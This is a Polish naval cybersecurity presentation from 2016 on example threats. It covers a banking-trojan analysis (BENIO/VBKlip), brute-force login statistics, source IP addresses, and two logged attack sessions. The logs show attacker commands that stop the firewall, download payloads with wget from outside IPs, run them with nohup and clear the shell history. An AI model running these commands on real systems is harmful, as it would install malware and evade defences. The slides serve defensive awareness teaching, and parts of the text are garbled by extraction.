CYBERATAK PRZYKADY ZAGROE Cyberatak przykady zagroe kmdr ppor
CYBERATAK – PRZYKŁADY ZAGROŻEŃ Cyberatak przykłady zagrożeń kmdr ppor. Adam STOJAŁOWSKI Sekcja Bezpieczeństwa Cyberprzestrzeni ZZWT w Gdynia 08. 12. 2016 r.
CYBERATAK – PRZYKŁADY ZAGROŻEŃ Celem prezentacji jest przedstawienie wybranych zagrożeń wpływających na bezpieczeństwo systemów teleinformatycznych powodowanych przez ataki pochodzące z cyberprzestrzeni. W dalszej części zostaną przedstawione przykłady zaobserwowanych cyberataków oraz potencjalne zagrożenia jakie mogą być następstwem zlekceważenia środków bezpieczeństwa.
CYBERATAK – PRZYKŁADY ZAGROŻEŃ Jak atakować Jak się bronić
CYBERATAK – PRZYKŁADY ZAGROŻEŃ „System jest tak bezpieczny jak bezpieczne jest jego najsłabsze ogniwo. ” Byłem przekonany, że ten mail wysłali do mnie z banku. Przedtem też otrzymywałem korespondencję mailową. Skąd mogłem wiedzieć, że w tym załączniku jest wirus. Ten załącznik nazywał się „Zmiana regulaminu świadczenia usług bankowych”. Co mam teraz zrobić? Przelałem tyle pieniędzy a oni mówią, że to moja wina. Mówią, że moim obowiązkiem przed zatwierdzeniem transakcji było sprawdzenie numeru konta. Co mam teraz zrobić?
CYBERATAK – PRZYKŁADY ZAGROŻEŃ „Nazywam się BENIO i stałem się sławny 30. 08. 2016” Trojan BENIO jako kolejna wersja VBKlip Infekcja poprzez link w mailu -. pdf. src C: !new supp! PRACA !drbenioX 1Project 1. vbp Trojan składa się z pięciu plików: Pliki wykonywalne (taskmgr. exe; mscvhost. exe; msavhost. exe) Plik konfiguracyjny (klucz rejestru „Windows 10 updater”) Plik PDF Zasada działania: Trojan przeszukuje pamięć procesu przeglądarki, aż znajdzie odpowiednie sekwencje znaków (np. „Numer konta: ”, „Odbiorca”, „Wyślij”). Po znalezieniu tych sekwencji podmienia dane znajdujące się między nimi. Zapobieganie: Przed przepisaniem kodu potwierdzającego przelew sprawdzić numer rachunku podany w SMSie przez bank. 01 0720 0700 mail. vfemail. net 02 0380 0400 587 03 9999 ghandimnkl@vfemail. net 04 9999 [PASSWORD] 05 0800 0650 whoratbbcg@vfemail. net pl/hades/do/Login Logowanie XPl@net XCredit Agricole Internetowej - Getin XInternetowej - Getin internetowej ING Moje ING m. Bank serwis transakcyjny Xinternetowej Banku Pocztow i. PKO - nowa bank XLogowanie - Raiffeisen Bank Pekao 24 - banko XMILLENNIUM
CYBERATAK – PRZYKŁADY ZAGROŻEŃ Próby przełamania zabezpieczeń – metoda słownikowa Używane nazwy użytkownika Używane hasła 350000 3500 3148 294084 3000 2517 250000 2500 2000 1832 1676 150000 1500 1000 50000 500 9146 3561 2341 2319 1993 1822 1631 977 1555 1532 1403 1400 1331 1261 901 0 st te nt ub ot ro ry er sp b us er 5 12 34 rt po su p 12 34 or in pa ss w m ad Top 10 d s p gio na Sp I nt Pl cm ub pi t es gu st te rt po su p us er in m ad ro ot 0 ra 300000
CYBERATAK – PRZYKŁADY ZAGROŻEŃ Ilość połączeń z danego adresu IP 70000 60000 1% 60008 5% 6% 50000 2% 2% 62% 116. 31. 116. 14 - CN 116. 31. 116. 40 - CN 116. 31. 116. 41 - CN 212. 83. 133. 5 - FR 116. 31. 116. 50 - CN 40000 9% 116. 31. 116. 30 - CN 116. 31. 116. 6 - CN 30000 116. 31. 116. 10 - CN 20000 10000 9% 123. 31. 34. 92 - VN 221. 229. 172. 114 - CN 8909 8750 5541 4475 2421 1899 1754 1626 1533 31. 1 16 11. 1 6. 4 31 -C. 1 N 16 11. 4 6. 0 31 -C. 1 N 16 21. 4 1 2. -C 83 N. 13 11 3. 6. 5 31 -F. 1 R 1 11 6. 50 6. 31 -C. 1 N 16 11. 3 0 6. -C 31. N 11 11 6. 6. 6 31 -C. 1 N 16 12. 1 3. 0 -C 31 22. 3 N 1. 4. 9 22 2 9. -V 17 N 2. 11 4 -C N 0 11 6. Około 92 % ruchu pochodzi z Chińskiej Republiki Ludowej Top 10
CYBERATAK – PRZYKŁADY ZAGROŻEŃ Source IP – przedstawienie graficzne żródło: Google Maps, Google Inc. 116. 31. 116. 14 60008 Guangzhou Guangdong Country Name China 116. 31. 116. 40 8909 Guangzhou Guangdong China CN 23. 1167 113. 25 116. 31. 116. 40 116. 31. 116. 41 8750 Guangzhou Guangdong China CN 23. 1167 113. 25 116. 31. 116. 41 212. 83. 133. 5 5541 France FR 48. 86 2. 35 212 -83 -133 -5. rev. poneytelecom. eu 116. 31. 116. 50 4475 Guangzhou Guangdong China CN 23. 1167 113. 25 116. 31. 116. 50 116. 31. 116. 30 2421 Guangzhou Guangdong China CN 23. 1167 113. 25 116. 31. 116. 30 116. 31. 116. 6 1916 Guangzhou Guangdong China CN 23. 1167 113. 25 116. 31. 116. 6 116. 31. 116. 10 1754 Guangzhou Guangdong China CN 23. 1167 113. 25 116. 31. 116. 10 123. 31. 34. 92 1626 Hanoi Thanh Pho Ha Noi Vietnam VN 21. 0333 105. 85 localhost 221. 229. 172. 114 1533 Nanjing Jiangsu Sheng China CN 32. 0617 118. 7778 221. 229. 172. 114 IP Address Probes City Region Code Latitude Longitude Hostname CN 23. 1167 113. 25 116. 31. 116. 14
CYBERATAK – PRZYKŁADY ZAGROŻEŃ Zarejestrowane przykłady ataku Próba instalacji złośliwego oprogramowania typu trojan Mul. Drop server: ~# service iptables stop server : ~# wget -O /tmp/sb 250 http: //23. 234. 25. 140: 15828/sb 250 http: ///tmp/sb 250: Unsupported scheme. server : ~# chmod 777 /tmp/sb 250 server : ~# /tmp/sb 250 bash: /tmp/sb 250: command not found server : ~# *** End of log! *** Wykonane operacje: - próba wyłączenia lokalnego firewala - próba instalacji złośliwego kodu
CYBERATAK – PRZYKŁADY ZAGROŻEŃ Zarejestrowane przykłady ataku Próba instalacji złośliwego oprogramowania typu trojan Linux/Setag. B. Gen serwer: ~# service iptables stop bash: service: command not found serwer : ~# chattr -i /usr/bin/wget Wykonane operacje: bash: chattr: command not found - próba wyłączenia lokalnego firewala serwer : ~# chmod 0755 /usr/bin/wget - próba zmiany atrybutów tylko dla roota serwer : ~# chattr -i /usr/bin/nohup bash: chattr: command not found - próba instalacji złośliwego kodu serwer : ~# chmod 0755 /usr/bin/nohup - próba podtrzymania działania złośliwego serwer : ~# chattr -i /etc/ kodu po wylogowaniu bash: chattr: command not found - czyszczenie historii operacji serwer : ~# cd / serwer : /# wget -O /tmp/vjudp http: //183. 61. 171. 149: 5896/vjudp http: ///tmp/vjudp: Unsupported scheme. serwer : /# chmod +x /tmp/vjudp serwer : /# nohup /tmp/vjudp > /dev/null 2>&1 & bash: nohup: command not found serwer : /# history -c *** End of log! ***
- Slides: 10